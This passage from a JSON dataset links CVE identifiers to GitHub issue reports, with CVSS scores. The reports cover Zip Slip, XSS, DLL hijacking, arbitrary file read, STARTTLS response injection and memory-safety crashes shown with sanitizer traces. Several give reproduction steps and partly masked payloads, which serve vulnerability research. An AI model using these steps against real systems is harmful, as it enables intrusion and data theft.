        "description": "DTF vulnerable to APITAG Slip\". Please provide answers to the following questions to help us narrow down, reproduce, and fix the problem. Fill out one section and delete the others. Which version of APITAG are you building with? > APITAG NUMBERTAG Which version of Visual Studio are you building with (if any)? > N/A Which version of the APITAG Toolset Visual Studio Extension are you building with (if any)? > N/A Which version of .NET are you building with? > Any If the problem occurs when installing your packages built with APITAG what is the version of Windows the package is running on? > N/A Describe the problem and the steps to reproduce it. > A maliciously crafted cabinet or zip file can be created with traversal paths in the archived file names. For example, APITAG . DTF's APITAG will concatenate the archived file path with a provided base directory, such that the traversal path can place the file outside the provided base directory and possibly overwriting the user's files. This is known as Zip Slip URLTAG . Describe the behavior you expected and how it differed from the actual behavior. > DTF should not write files outside the extraction folder. > This issue was originally reported by Devin Casadey.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-17414",
        "Issue_Url_old": "https://github.com/tinylcy/vino/issues/9",
        "Issue_Url_new": "https://github.com/tinylcy/vino/issues/9",
        "Repo_new": "tinylcy/vino",
        "Issue_Created_At": "2019-09-12T05:23:13Z",
        "description": "Application crashes when getting a long url.. Steps to reproduce: URLTAG Result: vn_get_string error: Resource temporarily unavailable.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-19011",
        "Issue_Url_old": "https://github.com/miniupnp/ngiflib/issues/16",
        "Issue_Url_new": "https://github.com/miniupnp/ngiflib/issues/16",
        "Repo_new": "miniupnp/ngiflib",
        "Issue_Created_At": "2019-10-30T18:20:15Z",
        "description": "Segmentation Fault in ngiflib.c. We found Segmentation Fault issue in gif2tga binary and gif2tga is complied with clang enabling ASAN. Machine Setup Machine : Ubuntu NUMBERTAG LTS gcc version NUMBERTAG APITAG NUMBERTAG APITAG Commit NUMBERTAG d NUMBERTAG Command : ./gif2tga $POC POC : FILETAG ASAN Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-20803",
        "Issue_Url_old": "https://github.com/GilaCMS/gila/issues/56",
        "Issue_Url_new": "https://github.com/gilacms/gila/issues/56",
        "Repo_new": "gilacms/gila",
        "Issue_Created_At": "2019-10-29T14:30:35Z",
        "description": "Cross Site Scripting (XSS) . Describe the bug XSS when a admin click on the link bellow, the g_preview_theme parameter not encoding the double quotes, an attacker could trick the admin to click on that link.. URLTAG To Reproduce Steps to reproduce the behavior NUMBERTAG Go to ' URLTAG NUMBERTAG Click on 'edit NUMBERTAG With a web proxy like burp intercept that request, and after id= parameter put \" \"+> APITAG alert NUMBERTAG APITAG NUMBERTAG See the alert on browser.. Screenshots If applicable, add screenshots to help explain your problem. Desktop (please complete the following information): Browser Firefox Version NUMBERTAG bit) Additional context In fact the attacker could trick any admin to click on URLTAG .. and execute javascript..",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-6129",
        "Issue_Url_old": "https://github.com/glennrp/libpng/issues/269",
        "Issue_Url_new": "https://github.com/glennrp/libpng/issues/269",
        "Repo_new": "glennrp/libpng",
        "Issue_Created_At": "2019-01-05T07:23:28Z",
        "description": "memory leak in png_create_info_struct. Hi,libpng team. there is a memory leak in the file APITAG of function png_create_info_struct. the bug is trigered by APITAG FILETAG the asan debug info is as follows: APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fe NUMBERTAG bf NUMBERTAG in malloc ( PATHTAG NUMBERTAG f NUMBERTAG in png_create_info_struct PATHTAG SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-6283",
        "Issue_Url_old": "https://github.com/sass/libsass/issues/2814",
        "Issue_Url_new": "https://github.com/sass/libsass/issues/2814",
        "Repo_new": "sass/libsass",
        "Issue_Created_At": "2019-01-14T05:26:25Z",
        "description": "APITAG heap buffer overflow PATHTAG in APITAG const ). A heap buffer overflow in APITAG in APITAG const ) Compile and reproduce: APITAG ldd: $ ldd sassc linux APITAG NUMBERTAG fffc NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG e NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG a5d NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG lib NUMBERTAG ld linu NUMBERTAG so NUMBERTAG f NUMBERTAG System information: APITAG Version: libsass NUMBERTAG sassc NUMBERTAG Poc: FILETAG Run: APITAG ASAN: APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ac at pc NUMBERTAG dfd bp NUMBERTAG ffcd8af NUMBERTAG sp NUMBERTAG ffcd8af NUMBERTAG READ of size NUMBERTAG at NUMBERTAG ac thread T NUMBERTAG dfc in APITAG const ) PATHTAG NUMBERTAG fd1 in char const APITAG APITAG &(char const APITAG const ))>(char const ) PATHTAG NUMBERTAG fd1 in char const APITAG const APITAG APITAG &(char const APITAG const ))>(char const ))>(char const ) PATHTAG NUMBERTAG fd1 in char const APITAG &(char const APITAG APITAG &(char const APITAG const ))>(char const ))>(char const ) PATHTAG NUMBERTAG fd1 in char const APITAG APITAG &(char const APITAG APITAG &(char const APITAG const ))>(char const ))>(char const ) PATHTAG NUMBERTAG fd1 in char const APITAG const APITAG &(char const APITAG const ))>(char const )), APITAG APITAG &(char const APITAG APITAG &(char const APITAG const ))>(char const ))>(char const ) PATHTAG NUMBERTAG fd1 in char const APITAG &(char const APITAG &(char const APITAG const ))>(char const )), APITAG APITAG &(char const APITAG APITAG &(char const APITAG const ))>(char const ))>(char const ) PATHTAG NUMBERTAG fd1 in char const APITAG const APITAG &(char const APITAG &(char const APITAG const ))>(char const )), APITAG APITAG &(char const APITAG APITAG &(char const APITAG const ))>(char const ))>(char const )), &(char const APITAG const APITAG const APITAG const )), &(char const APITAG const )), &(char const APITAG const ))>(char const ))>(char const ))>(char const ) PATHTAG NUMBERTAG a6 in char const APITAG const APITAG const APITAG &(char const APITAG &(char const APITAG const ))>(char const )), APITAG APITAG &(char const APITAG APITAG &(char const APITAG const ))>(char const ))>(char const )), &(char const APITAG const APITAG const APITAG const )), &(char const APITAG const )), &(char const APITAG const ))>(char const ))>(char const ))>(char const ))>(char const ) PATHTAG NUMBERTAG a6 in APITAG const ) PATHTAG NUMBERTAG fedcc in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG eee NUMBERTAG in APITAG PATHTAG NUMBERTAG ea NUMBERTAG f in APITAG PATHTAG NUMBERTAG d5b in APITAG const&, APITAG const&) PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG ) PATHTAG NUMBERTAG b NUMBERTAG in sass_compiler_parse PATHTAG NUMBERTAG b NUMBERTAG c2 in APITAG , APITAG ) PATHTAG NUMBERTAG b NUMBERTAG ac in sass_compile_data_context PATHTAG NUMBERTAG a NUMBERTAG in compile_stdin PATHTAG NUMBERTAG a NUMBERTAG ed in main PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG aad NUMBERTAG in _start ( PATHTAG NUMBERTAG ac is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG in realloc PATHTAG NUMBERTAG a6f NUMBERTAG in compile_stdin PATHTAG NUMBERTAG a NUMBERTAG ed in main PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG f in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in APITAG const ) Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff NUMBERTAG e NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG f NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fd fd fd fa fa fa fd fd NUMBERTAG c NUMBERTAG fff NUMBERTAG fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd NUMBERTAG c NUMBERTAG fff NUMBERTAG fd fa fa fa fd fd fd fa fa fa fd fd fd fd fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-6292",
        "Issue_Url_old": "https://github.com/jbeder/yaml-cpp/issues/657",
        "Issue_Url_new": "https://github.com/jbeder/yaml-cpp/issues/657",
        "Repo_new": "jbeder/yaml-cpp",
        "Issue_Created_At": "2019-01-02T14:29:02Z",
        "description": "Recursive Stack Frames: APITAG APITAG APITAG APITAG APITAG Hi there, An issue was discovered in APITAG as distributed in yaml cpp NUMBERTAG Stack Exhaustion occurs in the APITAG and there is a stack consumption problem caused by recursive stack frames: APITAG APITAG APITAG APITAG APITAG Here is the POC file. Please use \"./parse $POC\" to reproduce the bug FILETAG $git log ERRORTAG I have confirmed them with address sanitizer too. ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-6439",
        "Issue_Url_old": "https://github.com/wolfSSL/wolfssl/issues/2032",
        "Issue_Url_new": "https://github.com/wolfssl/wolfssl/issues/2032",
        "Repo_new": "wolfssl/wolfssl",
        "Issue_Created_At": "2019-01-15T20:11:17Z",
        "description": "heap buffer overflow [tls_bench NUMBERTAG ff NUMBERTAG Hi Team, Summary I have compiled APITAG using clang and a heap based buffer overflow is observed in APITAG System info: APITAG ASAN ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-7328",
        "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2449",
        "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2449",
        "Repo_new": "zoneminder/zoneminder",
        "Issue_Created_At": "2019-01-24T19:26:47Z",
        "description": "Reflected Cross Site Scripting(XSS) FILETAG NUMBERTAG Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view frame , insecurely prints the scale parameter value on the webpage that is without applying any proper filtration, leading to XSS. To Reproduce Affected URL : URLTAG APITAG \"> APITAG Payload used ERRORTAG Navigate to the Affected URL, Payload would be triggered. Affected source Files: PATHTAG PATHTAG APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7331",
        "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2451",
        "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2451",
        "Repo_new": "zoneminder/zoneminder",
        "Issue_Created_At": "2019-01-24T19:40:22Z",
        "description": "Self Stored Cross Site Scripting (XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug A user can edit an existing monitor thereby modifying various misc properties, one of them being signal check color . There exists no input validation & output filtration, leaving it vulnerable to HTML Injection, XSS attack. To Reproduce Affected URL : URLTAG Payload used APITAG Navigate to the Affected URL & modify the Signal check Color field with the provided payload & click on save. Click on the color box, XSS would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7339",
        "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2460",
        "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2460",
        "Repo_new": "zoneminder/zoneminder",
        "Issue_Created_At": "2019-01-24T20:29:35Z",
        "description": "POST Reflected Cross Site Scripting(XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The parameter value level , is displayed insecurely, without applying any proper output filtration leading to XSS To Reproduce Affected URL : FILETAG POST Data ERRORTAG Payload used ERRORTAG Navigate to the Affected URL, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-9114",
        "Issue_Url_old": "https://github.com/libming/libming/issues/170",
        "Issue_Url_new": "https://github.com/libming/libming/issues/170",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2019-01-02T06:25:41Z",
        "description": "Out Of Bound Write in function APITAG . An Out Of Bound Write bug was found in function APITAG in decompile.c . Details with asan output is as below: ERRORTAG poc file URLTAG to reproduce it ,run swftocxx with oob_write_decompile NUMBERTAG APITAG credit: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-9116",
        "Issue_Url_old": "https://github.com/SublimeTextIssues/Core/issues/2544",
        "Issue_Url_new": "https://github.com/sublimehq/sublime_text/issues/2544",
        "Repo_new": "sublimehq/sublime_text",
        "Issue_Created_At": "2019-01-04T08:29:45Z",
        "description": "DLL hijack in Sublime Text NUMBERTAG ersion NUMBERTAG build NUMBERTAG win NUMBERTAG bit. Description Sublime Text NUMBERTAG ersion NUMBERTAG build NUMBERTAG allows local users to gain privileges by creating a PATHTAG folder and then copying a Trojan horse api ms win core fibers l NUMBERTAG dll or api ms win core localization l NUMBERTAG dll file into this new folder, then creating FILETAG and opening it with FILETAG aka DLL Hijacking Steps to reproduce NUMBERTAG First step Create a new PATHTAG folder and then create a file named FILETAG in this folder NUMBERTAG Second step Copy a Trojan horse api ms win core fibers l NUMBERTAG dll or api ms win core localization l NUMBERTAG dll file into sublime_text folder NUMBERTAG Third step Open FILETAG by using FILETAG Expected behavior Load the FILETAG when open the FILETAG Actual behavior Load the FILETAG when open the FILETAG Environment Operating system and version: Windows NUMBERTAG APITAG NUMBERTAG Service Pack NUMBERTAG Sublime Text: Build NUMBERTAG bit",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-12723",
        "Issue_Url_old": "https://github.com/Perl/perl5/issues/16947",
        "Issue_Url_new": "https://github.com/perl/perl5/issues/16947",
        "Repo_new": "perl/perl5",
        "Issue_Created_At": "2019-04-10T13:09:22Z",
        "description": "Segfault in S_study_chunk APITAG Migrated from rt.perl.org NUMBERTAG URLTAG (status was 'open') Searchable as RT NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-12723",
        "Issue_Url_old": "https://github.com/Perl/perl5/issues/17743",
        "Issue_Url_new": "https://github.com/perl/perl5/issues/17743",
        "Repo_new": "perl/perl5",
        "Issue_Created_At": "2020-04-23T13:10:14Z",
        "description": "study_chunk recursion. This is a placeholder ticket for consideration of a theoretically possible bug. In NUMBERTAG we found that study_chunk reinvokes itself in two ways by simple recursion, and by enframing. In some cases that involves restudying regexp ops multiple times, whereas in other cases the reinvocation is the only time the relevant ops are studied. The primary results of studying are a) to capture global information about the regexp that will be used for optimization at runtime; b) to make in place modifications to the ops for optimization (optional but desirable); and c) to make mandatory modifications to the ops, replacing temporary compile time only ops that the runtime engine does not know how to handle. Because of (c) it is required that every op is studied at least once. When ops are studied multiple times that can cause problems: the first invocation may capture information about the program, then reinvoke, then attempt to use the captured information assuming it has not changed. The conclusion is that mutation of ops must happen only once, at the outermost level of reinvocation that will act on the relevant ops. As far as I was able to discover the only case in which ops are studied multiple times is in the handling of GOSUB, which reinvokes by enframing. In NUMBERTAG this was resolved by recording in each frame whether it, or any outer frame, represented the handling of a GOSUB, and suppressing all mutating changes if so (confident that the same ops will be studied at some point in some outer frame that is not within the handling of a GOSUB). When we reinvoke by recursion, however, any frames used by the caller are not visible to the callee; as such it may still be possible to trigger the same types of problem if reinvocation involves a mix of enframing and recursion. Extending the fix from NUMBERTAG ad NUMBERTAG d3f to handle this case would involve adding an extra boolean argument APITAG to study_chunk. All principal calls would pass this in as NUMBERTAG all recursive calls would pass in the local value of APITAG ; and the setting of APITAG would change to: APITAG I don't intend to make such a change unless we find a testcase to show this is a real rather than a theoretical problem.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-14156",
        "Issue_Url_old": "https://github.com/openbmc/openbmc/issues/3670",
        "Issue_Url_new": "https://github.com/openbmc/openbmc/issues/3670",
        "Repo_new": "openbmc/openbmc",
        "Issue_Created_At": "2020-06-15T14:49:16Z",
        "description": "Reserved for bug report.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-14160",
        "Issue_Url_old": "https://github.com/gotenberg/gotenberg/issues/215",
        "Issue_Url_new": "https://github.com/gotenberg/gotenberg/issues/215",
        "Repo_new": "gotenberg/gotenberg",
        "Issue_Created_At": "2020-06-15T18:02:03Z",
        "description": "Vulnerabilities. Hi, I've identified NUMBERTAG high/critical severity vulnerabilities in Gotenberg that can potentially lead to RCE in the Docker container. These are different than the ones identified in URLTAG URLTAG . I've sent the details through email already on the provided PGP key in that existing issue. Thanks, APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-15953",
        "Issue_Url_old": "https://github.com/dinhvh/libetpan/issues/386",
        "Issue_Url_new": "https://github.com/dinhvh/libetpan/issues/386",
        "Repo_new": "dinhvh/libetpan",
        "Issue_Created_At": "2020-06-18T12:09:50Z",
        "description": "Buffering issues with STARTTLS in IMAP. We found a STARTTLS issue in APITAG which affects IMAP (and probably other protocols.) When the server responds with its \"let's do TLS now message\", e.g. APITAG , APITAG will read any data after the and save it into some internal buffer for later processing. This is problematic, because a MITM attacker can inject arbitrary responses. I havn't tested it to this extent, but I suspect that this is enough to forge entire mailboxes even though STARTTLS is used. There is a nice blogpost by Wietse Venema about a \"command injection\" in postfix ( URLTAG What we have here is the problem in reverse, i.e. not a command injection, but a \"response injection.\" Example trace to give an intuition: CODETAG An attacker can probably inject more responses and (in the worst case) mimic a whole session. There are (from my view) three possible fixes NUMBERTAG discard any remaining data after stls NUMBERTAG shovel the extra data into the TLS layer (where it belongs), and NUMBERTAG error out as this is clearly a protocol violation. The (maybe silly or even wrong) commit in URLTAG seems to fix the issue (please ignore the .idea folder :P)",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.4,
        "impactScore": 5.2,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-16587",
        "Issue_Url_old": "https://github.com/AcademySoftwareFoundation/openexr/issues/491",
        "Issue_Url_new": "https://github.com/academysoftwarefoundation/openexr/issues/491",
        "Repo_new": "academysoftwarefoundation/openexr",
        "Issue_Created_At": "2019-07-24T15:34:32Z",
        "description": "SEGV exrheader in APITAG Hi, I found a crash due to a heap buffer overflow bug on exrheader (the latest commit APITAG on master). APITAG URLTAG Command: exrheader APITAG ASAN says NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ec NUMBERTAG at pc NUMBERTAG f NUMBERTAG af NUMBERTAG f NUMBERTAG f bp NUMBERTAG ffc0b8eb5e0 sp NUMBERTAG ffc0b8eb5d0 READ of size NUMBERTAG at NUMBERTAG ec NUMBERTAG thread T NUMBERTAG f NUMBERTAG af NUMBERTAG f NUMBERTAG e in APITAG APITAG , APITAG > > const&) PATHTAG NUMBERTAG f NUMBERTAG af NUMBERTAG fee0 in APITAG PATHTAG NUMBERTAG f NUMBERTAG af NUMBERTAG f in APITAG PATHTAG NUMBERTAG f NUMBERTAG af NUMBERTAG bb in APITAG const , int, bool) PATHTAG NUMBERTAG ERRORTAG NUMBERTAG d8 in APITAG const ) PATHTAG NUMBERTAG eb in main PATHTAG NUMBERTAG f NUMBERTAG aea NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG ec NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG afa NUMBERTAG in operator new(unsigned long) ( PATHTAG NUMBERTAG f NUMBERTAG af NUMBERTAG de in APITAG >::allocate(unsigned long, void const ) PATHTAG NUMBERTAG f NUMBERTAG af NUMBERTAG de in APITAG > APITAG >&, unsigned long) PATHTAG NUMBERTAG f NUMBERTAG af NUMBERTAG de in APITAG , APITAG > >::_M_allocate(unsigned long) PATHTAG NUMBERTAG f NUMBERTAG af NUMBERTAG de in void APITAG , APITAG > APITAG APITAG &&) PATHTAG NUMBERTAG f NUMBERTAG af NUMBERTAG de in void APITAG , APITAG > APITAG APITAG &&) PATHTAG NUMBERTAG f NUMBERTAG af NUMBERTAG de in APITAG , APITAG > APITAG &&) PATHTAG NUMBERTAG f NUMBERTAG af NUMBERTAG de in APITAG PATHTAG ~~~ Thanks, Manh Dung",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-16588",
        "Issue_Url_old": "https://github.com/AcademySoftwareFoundation/openexr/issues/493",
        "Issue_Url_new": "https://github.com/academysoftwarefoundation/openexr/issues/493",
        "Repo_new": "academysoftwarefoundation/openexr",
        "Issue_Created_At": "2019-07-24T15:47:58Z",
        "description": "SEGV exrmakepreview in APITAG Hi, I found a null pointer dereference bug on exrmakepreview (the latest commit NUMBERTAG on master). APITAG URLTAG Command: exrmakepreview v APITAG /dev/null ASAN says NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG db3 bp NUMBERTAG fbf NUMBERTAG cd NUMBERTAG sp NUMBERTAG ffe NUMBERTAG fc NUMBERTAG T NUMBERTAG db2 in APITAG PATHTAG NUMBERTAG db2 in APITAG const , char const , int, float, bool) PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG fbf NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG ) ~~~ Thanks, Manh Dung",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-16589",
        "Issue_Url_old": "https://github.com/AcademySoftwareFoundation/openexr/issues/494",
        "Issue_Url_new": "https://github.com/academysoftwarefoundation/openexr/issues/494",
        "Repo_new": "academysoftwarefoundation/openexr",
        "Issue_Created_At": "2019-07-24T15:48:18Z",
        "description": "SEGV exrmakepreview in APITAG Hi, I found a crash due to a heap buffer overflow bug on exrmakepreview (the latest commit NUMBERTAG on master). APITAG URLTAG Command: exrmakepreview v APITAG /dev/null ASAN says NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG e NUMBERTAG at pc NUMBERTAG f2f NUMBERTAG c NUMBERTAG a bp NUMBERTAG ffe NUMBERTAG e NUMBERTAG sp NUMBERTAG ffe NUMBERTAG e NUMBERTAG READ of size NUMBERTAG at NUMBERTAG e NUMBERTAG thread T NUMBERTAG f2f NUMBERTAG c NUMBERTAG in APITAG int, int, int) ( PATHTAG NUMBERTAG f2f NUMBERTAG a8eac in APITAG PATHTAG NUMBERTAG f2f NUMBERTAG ae NUMBERTAG in APITAG PATHTAG NUMBERTAG b in APITAG const , char const , int, float, bool) PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f2f NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG ) ~~~ Thanks, Manh Dung",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-18878",
        "Issue_Url_old": "https://github.com/zorlan/skycaiji/issues/13",
        "Issue_Url_new": "https://github.com/zorlan/skycaiji/issues/13",
        "Repo_new": "zorlan/skycaiji",
        "Issue_Created_At": "2018-09-13T07:25:24Z",
        "description": "Skycaiji cms has an arbitrary file read vulnerability at NUMBERTAG I found an arbitrary file read vulnerability at NUMBERTAG In the module of error log URL: FILETAG The parameter of file can control\uff0cfor example read FILETAG POC: APITAG suggest\uff1alimit the parameter of file Info NUMBERTAG I hope you can fix it Best wish! author by:xijun. EMAILTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-19492",
        "Issue_Url_old": "https://github.com/pts/sam2p/issues/66",
        "Issue_Url_new": "https://github.com/pts/sam2p/issues/66",
        "Repo_new": "pts/sam2p",
        "Issue_Created_At": "2019-07-18T11:14:43Z",
